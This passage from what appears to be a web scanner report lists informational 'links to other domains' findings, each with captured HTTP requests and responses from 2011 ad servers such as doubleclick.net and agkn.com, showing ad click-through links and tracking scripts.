Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<body style="border: 0; margin: 0; padding: 0;">


<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=191113646?imid=4868126810786847819&ipid=804&crid=170&a=CLICK&status=0&l=http://www.aggregateknowledge.com" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_300x250.jpg" alt="" border="0">
</a>
...[SNIP]...

15.2. http://ad.agkn.com/iframe!t=1131!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABvUqUAAAAAAKWdKAAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAtPUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC28wb3QvquCrX4WZpQcY4wcHVfXnpzR4ctG.6oAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15j13o5q5%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320281%2FL%3D.mJTO0PDlB_pARpjTl.wjQAqMhd7ak5mFbgADqhS%2FB%3D0F2xPtj8elw-%2FJ%3D1315313081109312%2FK%3DdHuXEgTLQ4cGOnShgI49sw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3D.mJTO0PDlB%255fpARpjTl.wjQAqMhd7ak5mFbgADqhS%26_salt%3D1652832779%26cb%3D1315313081109312%26i%3D140509%26r%3D0,02602a14-d886-11e0-8b21-78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:44:56 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 721
Date: Tue, 06 Sep 2011 12:44:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<body style="border: 0; margin: 0; padding: 0;">


<a href="http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=610554187?imid=6007661064900069334&ipid=805&crid=176&a=CLICK&status=0&l=http://www.aggregateknowledge.com" rel="nofollow external" target="_blank">
<img src="http://content.aggregateknowledge.com/ak/static/default/ak_static_728x90.jpg" alt="" border="0">
</a>
...[SNIP]...

15.3. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
<noscript><a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,http://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/f/21e/%2a/y%3B243197673%3B1-0%3B0%3B65511749%3B4307-300/250%3B43561982/43579769/1%3B%3B%7Esscs%3D%3fhttp%3a%2f%2fi.mitsubishiCars.com/%3Fcid%3DAD_062311_iB_100365"><img src="http://s0.2mdn.net/1033846/mmna_i_likeable_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.4. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:41 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=http%3a%2f%2fwww.comcast.com/Movers/Move.cspx%3Fdfaid%3D2199899%26cmp%3D0"><img src="http://s0.2mdn.net/2199899/Q211_CORP_AW_MOV_XF-TP_728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.5. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Jun 20 19:41:57 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=http%3a%2f%2fwww.comcast.com/Movers/Move.cspx%3Fdfaid%3D2199899%26cmp%3D0"><img src="http://s0.2mdn.net/2199899/Q211_CORP_AW_MOV_XF-TP_300x250.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.6. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
33263071%3B2-0%3B0%3B43807772%3B4307-300/250%3B43787172/43804959/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/4/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807772-233263071-43804959"><img src="http://s0.2mdn.net/1420759/lmb_iau_PassAgeRedTicketCNP50k_DUIRipRidEZ_RO455_0811_300x250.gif" width=300 height=250 border="0" alt="" galleryimg="no"></a>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

15.7. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
220264224%3B0-0%3B0%3B43807788%3B3454-728/90%3B43552622/43570409/1%3B%3B%7Esscs%3D%3fhttp://c.casalemedia.com/c/2/1/80254/https://insurance.lowermybills.com/auto/?sourceid=43807788-220264224-43570409"><img src="http://s0.2mdn.net/1420759/lmb_iau_CheckAgeRangeRobertFillBd15s40k_DynStRidEasy_0811_728x90.gif" width=728 height=90 border="0" alt="" galleryimg="no"></a>
...[SNIP]...
<!-- BEGIN AIQ_PIXEL -->
<script type="text/javascript" src="http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI"></script>
...[SNIP]...

15.8. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
8925.3243961%3Furl%3Dhttp://www.grilling.com/offers/kcm2offerribs?utm_medium=paid-media&utm_campaign=fy12+jas+kc+masterpiece&utm_content=65761146&utm_term=41307257&utm_source=N3340.dedicatedmedia.com"><img src="http://s0.2mdn.net/1261211/ribs coupon_300x250_Mar2011.jpg" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...

15.9. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.101

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N3382.Yahoo/B5116950.101;sz=200x33;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 938
Date: Tue, 06 Sep 2011 12:44:58 GMT

